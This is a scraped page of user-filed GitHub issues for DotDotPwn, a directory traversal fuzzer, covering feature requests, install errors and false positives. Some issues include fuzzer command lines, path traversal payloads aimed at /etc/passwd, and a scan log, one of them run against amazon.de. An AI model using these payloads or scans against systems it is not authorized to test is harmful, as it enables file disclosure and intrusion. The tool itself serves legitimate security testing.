wireghoul / dotdotpwn Goto Github PK
View Code? Open in Web Editor NEWDotDotPwn - The Directory Traversal Fuzzer
Home Page: http://dotdotpwn.blogspot.com/
License: GNU General Public License v3.0
DotDotPwn - The Directory Traversal Fuzzer
Home Page: http://dotdotpwn.blogspot.com/
License: GNU General Public License v3.0
I would like to add an authorization header to requests in "http-url" module, maybe somewhat like with curl - curl -H "authorization: Bearer ..."
:
dotdotpwn -m http-url -u https://example.com/foo?bar=TRAVERSAL -k "root:" -H "authorization: Bearer ..."
Is this feature in place? If so, I guess it needs to be better documented, otherwise I suggest implementing such feature.
Hi! First of all, congratulations for the great App.
I would like to report a behavior I believe will help many users. In the HTTP_url.PM, the code dictates the app should terminate in case of a ping failure:
if(!$ping){
die "[-] Web server didn't respond !\n";
I was testing a windows box where firewall would not allow ping, and modifying the code allowed me to proceed with the test.
While by design, modifying the message to mention 'ping failure' as the cause would narrow down the issue for users.
Continue with your great projects! :)
If I use -x $InsertPortNumberHere, in the banner before it runs it shows "Port: 443". When I omit the -x option, it then display the default port for the module selected. I've only tested this with the http module so far.
While trying to install dotdotpwn in a docker image, I noticed the following at run time when executing dotdotpwn
Cannot open User-Agents.txt file: No such file or directory at /usr/lib/perl5/vendor_perl/DotDotPwn/HTTP_Url.pm
dotdotpwn was installed that way
cp -r dotdotpwn-3.0.2/DotDotPwn/ /usr/lib/perl5/vendor_perl
cp dotdotpwn-3.0.2/dotdotpwn.pl /usr/bin/dotdotpwn
Libraries are found from /usr/lib/perl5/vendor_perl
, no problem, but this specific resource (User-Agents.txt
) cannot be found by HTTP_Url.pm
even-though it is right next to it
bash-5.0# ls /usr/lib/perl5/vendor_perl/DotDotPwn/
BisectionAlgorithm.pm File.pm HTTP.pm Payload.pm TFTP.pm User-Agents.txt
FTP.pm Fingerprint.pm HTTP_Url.pm STDOUT.pm TraversalEngine.pm
I do not know how relative path is handled by pearl but I wondered if my current problem had anything to do with this specific line
dotdotpwn/DotDotPwn/HTTP_Url.pm
Line 32 in 98760e1
It might sound naive but, from the standpoint of HTTP_Url.pm
, isn't User-Agents.txt
supposed to be at ./User-Agents.txt
instead of DotDotPwn/User-Agents.txt
?
I am a complete noob with pearl so I am open to any cleaner way to install this tool system wide
How can I give a user:password@host combination for a host that requires basic auth? Alternatively, can I set a header to produce the same result?
Will there be HTTPS module in future? Now it is not supported.
Does this tool support adding custom cookies and request headers?
Hi,
there seems to be a typo in the help banner
(use https:// for in url for http-url)
https://github.com/wireghoul/dotdotpwn/blob/master/dotdotpwn.pl#L112
I don't know exactly what the sentence should be so just creating an issue and no pull request.
Hi,
for some scenarios it could be useful to set a single deepnes or a deepness range to the traversal pattern. For example if we know that the traversal is in this url:
http://example.com/foo/bar/foo/bar/foo.php?=TRAVERSAL
it doesn't make any sense when testing for /etc/passwd to traversal like:
http://example.com/foo/bar/foo/bar/foo.php?=../../etc/passwd
The minimum traversal deepnes should be 4 in this case which could speed up the testing a lot as the deepnes of 1 to 3 probably won't get any results. Any opinions to this?
Ie, if / has to be encoded as %2f the traversal should use ..%2f..%2f..%2fetc%2fpasswd
not ..%2f..%2f../etc/passwd
Currently the http-url and http modules are requiring a pattern passed via the -k parameter like -k "root:"
It would make sense to use sane defaults for each tested file like:
/etc/passwd -> root:
/etc/hosts -> localhost
boot.ini -> [boot loader]
and just make -k optional where people can overwrite the tested pattern.
Hello!
Could you please help me resolve the issue that I am having when trying to dotdotpwn my website? I downloaded the most recent version of dotdotpwn yesterday to my Kali Linux VM. I have been trying various commands, the latest being:
./dotdotpwn.pl -m http -h all-around-audit-solutions.com -M GET
The response that I keep receiving is:
Web server (all-around-audit-solutions.com) didn't respond !
Could this be because the website is hosted on a GoDaddy server?
Thank you very much for your time and best regards! BTW, I am impressed with your tool as I was able to run it against other domains.
Hi,
I've ran dotdotpwn v3.0.2 against a web application that has reported 304 traversals.
I ran the following command:
./dotdotpwn.pl -m http -h xxxxxxxx -S -k "root"
All of the vulnerable traversals have a "?" in them, not sure if that is relevant. An example is:
[*] Testing Path (response analysis): https://xxxxxxxxxxx:443/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue <- VULNERABLE!
But when I enter that URL into Chrome it comes back as 403 forbidden.
If it helps the server is running nginx v1.11.3
Thanks for your help!
is there any option to increase the speed of the tool?
thanks in advance
Hi there,
i installed the latest version of dotdotpwn on my windows, and its modules including Net::FTP, TFTP, Time::Hires, Socket, IO::Socket, Getopt::Std, Switch. When I executed dotdotpwn.pl and pressed Ctrl+C to terminate the test, it tells me Report saved: Reports/TEST_URL_05-28-2016_09-13.txt.
Why can't i find the report folder?
Please help, thanks
The software outputs hundres of vulnerable urls but they are actually redirected to home page of the website, which is not vulnerable.
Hi there! Great tool!
I try to run it by using:
$ ./dotdotpwn.pl -m http-url -u "http://amazon.de:80/TRAVERSAL" -o unix -k "root:"
...
[+] Report name: Reports/amazon.de_08-27-2014_13-26.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: amazon.de
[+] Setting Operating System type to "unix"
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 10560
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Replacing "TRAVERSAL" with the traversals created and sending
[+] Fuzz testing finished after 0.02 minutes (1 seconds)
[+] Total Traversals found (so far): 0
[-] Web server didn't respond !
Web server didn't respond
. But the host is obviously online. What am I doing wrong?
Thx in advance,
Victor
Hey,
There's no flag to use cookies.. that makes that tool less useful from my presepection.
Would be nice to have one
what is the right way to combine multiple key words to search in the files, Is it like :
dotdotpwn -m http-url -u https://www.site/TRAVERSAL -k 'root:' 'secret' (space between words)
or
dotdotpwn -m http-url -u https://www.site/TRAVERSAL -k 'root:', 'secret' ( comma between words)
after installed the perl module in mint distro
causes the error below
Can not locate TFTP.pm in @inc (you may need to install the TFTP module) (@inc contains:. / Etc / perl /usr/local/lib/perl/5.18.2 / usr / local / share / perl /5.18.2 / usr / lib / perl5 / usr / share / perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 / usr / local / lib / site_perl) at DotDotPwn / TFTP.pm line 13.
Solution
the line of code use TFTP;
you must place the following line because the module is in 'Net'
use Net ::TFTP; # / Usr / share / perl5 / Net / TFTP.pm
Hello, could you update to the Perl v5.14.2
i get this error
Can't locate TFTP.pm in @inc (@inc contains: . /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl) at DotDotPwn/TFTP.pm line 13.
BEGIN failed--compilation aborted at DotDotPwn/TFTP.pm line 13.
Compilation failed in require at DotDotPwn/BisectionAlgorithm.pm line 36.
BEGIN failed--compilation aborted at DotDotPwn/BisectionAlgorithm.pm line 36.
Compilation failed in require at DotDotPwn/HTTP.pm line 11.
BEGIN failed--compilation aborted at DotDotPwn/HTTP.pm line 11.
Compilation failed in require at ./dotdotpwn.pl line 59.
BEGIN failed--compilation aborted at ./dotdotpwn.pl line 59.
Net::FTP is up to date (3.08).
TFTP is up to date (1).
Time::HiRes is up to date (1.9739).
Socket is up to date (2.021).
IO::Socket is up to date (1.31).
Getopt::Std is up to date (1.11).
Switch is up to date (2.17).
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.